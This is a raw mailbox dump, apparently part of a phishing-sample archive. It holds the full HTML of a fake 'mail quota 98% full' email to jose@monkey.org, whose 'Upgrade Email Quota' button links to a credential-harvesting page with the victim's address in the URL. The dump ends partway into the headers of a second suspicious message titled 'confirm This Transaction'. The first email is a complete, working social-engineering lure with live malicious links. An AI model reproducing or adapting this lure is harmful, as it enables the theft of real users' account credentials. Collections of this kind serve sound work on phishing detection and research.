From: monkey.org  <lulz@hawaiiantel.net>
To: jose@monkey.org
Subject: =?UTF-8?B?WW91ciBFbWFpbCDinIkg?=jose@monkey.org Is Full Upgrade Email Now !!!
Date: 06 Jan 2019 18:41:04 -0800
Message-ID: <20190106184104.667B0B33A84B01E5@hawaiiantel.net>
MIME-Version: 1.0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - good.thehostingserver.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - delightdesigns.co.in
X-Get-Message-Sender-Via: good.thehostingserver.com: authenticated_id: exports@delightdesigns.co.in
X-Authenticated-Sender: good.thehostingserver.com: exports@delightdesigns.co.in
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 4

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.=
w3.org/TR/html4/loose.dtd">

<HTML><HEAD>
<META name=3DGENERATOR content=3D"MSHTML 11.00.9600.18860"></HEAD>
<body style=3D"MARGIN: 0.5em">
<P><BR style=3D'FONT-SIZE: 11px; FONT-FAMILY: "Lucida Grande",Verdana,Arial=
,Helvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFO=
RM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; LETTE=
R-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; fo=
nt-variant-ligatures: normal; font-variant-caps: normal; text-decoration-st=
yle: initial; text-decoration-color: initial'>
<BR style=3D'FONT-SIZE: 11px; FONT-FAMILY: "Lucida Grande",Verdana,Arial,He=
lvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TEXT-TRANSFORM:=
 none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: normal; LETTER-S=
PACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDENT: 0px; font-=
variant-ligatures: normal; font-variant-caps: normal; text-decoration-style=
: initial; text-decoration-color: initial'>
<table style=3D"FONT-SIZE: 11px; FONT-FAMILY: &quot;Lucida Grande&quot;,Ver=
dana,Arial,Helvetica,sans-serif; WHITE-SPACE: normal; WORD-SPACING: 0px; TE=
XT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STYLE: nor=
mal; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,255); TEXT-INDEN=
T: 0px; font-variant-ligatures: normal; font-variant-caps: normal; text-dec=
oration-style: initial; text-decoration-color: initial">
<TBODY>
<TR>
<td width=3D"30"><BR></TD>
<td>
<table>
<TBODY>
<TR>
<td>
<table style=3D"border-radius: 3px" cellspacing=3D"0">
<TBODY>
<TR>
<td style=3D"BORDER-TOP: rgb(255,0,0) 1px solid; HEIGHT: 25px; BORDER-RIGHT=
: rgb(255,0,0) 1px solid; WIDTH: 500px; BORDER-BOTTOM: rgb(255,0,0) 1px sol=
id; BORDER-LEFT: rgb(255,0,0) 1px solid; BACKGROUND-COLOR: rgb(255,0,0)">
<DIV style=3D"PADDING-TOP: 0px; BORDER-TOP-WIDTH: 0px" align=3Dcenter><FONT=
 color=3D#ffffff size=3D2 face=3Dcalibri>Mail Quota: (98% Full)</FONT></DIV=
></TD>
<td style=3D"BORDER-TOP: rgb(29,124,14) 1px solid; HEIGHT: 25px; BORDER-RIG=
HT: rgb(29,124,14) 1px solid; WIDTH: 15px; BORDER-BOTTOM: rgb(29,124,14) 1p=
x solid; BORDER-LEFT: rgb(29,124,14) 1px solid; BACKGROUND-COLOR: rgb(29,12=
4,14)"><BR></TD></TR>
<TR></TR></TBODY></TABLE><BR>
<table align=3D"center">
<TBODY>
<TR>
<td style=3D"BORDER-TOP: rgb(29,124,14) 1px solid; HEIGHT: 200px; BORDER-RI=
GHT: rgb(29,124,14) 1px solid; WIDTH: 470px; BORDER-BOTTOM: rgb(29,124,14) =
1px solid; PADDING-BOTTOM: 25px; PADDING-TOP: 25px; PADDING-LEFT: 25px; BOR=
DER-LEFT: rgb(29,124,14) 1px solid; PADDING-RIGHT: 25px; BACKGROUND-COLOR: =
rgb(255,255,255)"><FONT size=3D2 face=3Dverdana>Attention:<SPAN>&nbsp;</SPA=
N>jose<SPAN>&nbsp;</SPAN><BR><BR>Your email quota jose@monkey.org&nbsp;has =
reached 98% and will soon exceed its limit.<SPAN>
 &nbsp;</SPAN><BR>Follow the URL below to upgrade your quota to<SPAN>&nbsp;=
</SPAN><B>25GB</B><SPAN>&nbsp;</SPAN>for free to avoid loss of email data.<=
SPAN>&nbsp;</SPAN><BR><BR>
<A style=3D"COLOR: rgb(1,134,186)" href=3D"https://alaskaindia.in/update/Ne=
w_update/secure_updates/index.php?email=3Djose@monkey.org" rel=3Dnoreferrer=
 target=3D_blank data-saferedirecturl=3D"https://www.google.com/url?q=3Dhtt=
ps://kjtehrani.com/admin/new_fmt_script/index.php?email%3D%250%25&amp;sourc=
e=3Dgmail&amp;ust=3D1546213289479000&amp;usg=3DAFQjCNE-YJHU01pm3s-Oz20JkzWO=
0bIqTg"><FONT color=3D#1d7c0e size=3D2 face=3Dverdana><B>Upgrade Email Quot=
a<SPAN>&nbsp;</SPAN></B></FONT></A><BR><BR><BR>Source:<SPAN>&nbsp;</SPAN>
<STRONG> </STRONG>monkey.org</FONT></TD></TR></TBODY></TABLE></TD></TR></TB=
ODY></TABLE></TD></TR></TBODY></TABLE></P></BODY></HTML>

From jose@monkey.org Wed Jan  9 00:15:20 2019 +0000
Return-Path: michael911@wsu.edu
Delivered-To: jose@monkey.org
X-FDA: 75031664400.17.cook50_85ddd036a445d
X-Spam-Summary: 75,0,0,8747ce3525bd2df7,d41d8cd98f00b204,michael911@wsu.edu,:michael911@wsu.edu,RULES_HIT:41:72:146:327:355:379:960:962:967:973:982:983:988:989:1005:1189:1208:1221:1260:1263:1313:1314:1345:1381:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1685:1719:1730:1777:1792:2194:2198:2199:2200:2525:2527:2539:2560:2568:2610:2629:2682:2685:2734:2741:2859:2890:2891:2892:2894:2900:2901:2903:2909:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3148:3352:3586:3865:3867:3868:3871:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4250:4310:4321:4384:4605:4700:5007:6248:6261:6671:6672:6678:6687:6703:7628:7652:7974:8518:8599:8603:8957:9025:9080:9121:9149:9388:9416:9908:9995:10004:10049:10128:10305:10346:10881:10954:11074:11209:11233:11473:11651:11657:11658:11805:11914:12043:12438:12555:12561:12679:12740:12895:12986:13007:13008:13025:13038:13132:13139:13200:13229:13231:13237:13439:14158:14877:21080:21347:21397:214
X-HE-Tag: cook50_85ddd036a445d
X-Filterd-Recvd-Size: 23211
Received: from dukecmfep04.coxmail.com (dukecmfep04.coxmail.com [68.99.120.39])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed,  9 Jan 2019 00:15:19 +0000 (UTC)
Received: from dukecmimpo03.coxmail.com ([68.99.120.137])
          by dukecmfep04.coxmail.com
          (InterMail vM.8.01.05.08 201-2260-151-120-20120517) with ESMTP
          id <20190109001105.HVJZ23013.dukecmfep04.coxmail.com@dukecmimpo03.coxmail.com>;
          Tue, 8 Jan 2019 19:11:05 -0500
Received: from [25.68.93.131] ([172.18.18.217])
	by dukecmimpo03.coxmail.com with bizsmtp
	id N03w1z0064h0NJL010AxWY; Tue, 08 Jan 2019 19:11:03 -0500
Content-Type: multipart/alternative; boundary="===============1889313711=="
MIME-Version: 1.0
Subject: confirm This Transaction
To: Recipients <michael911@wsu.edu>
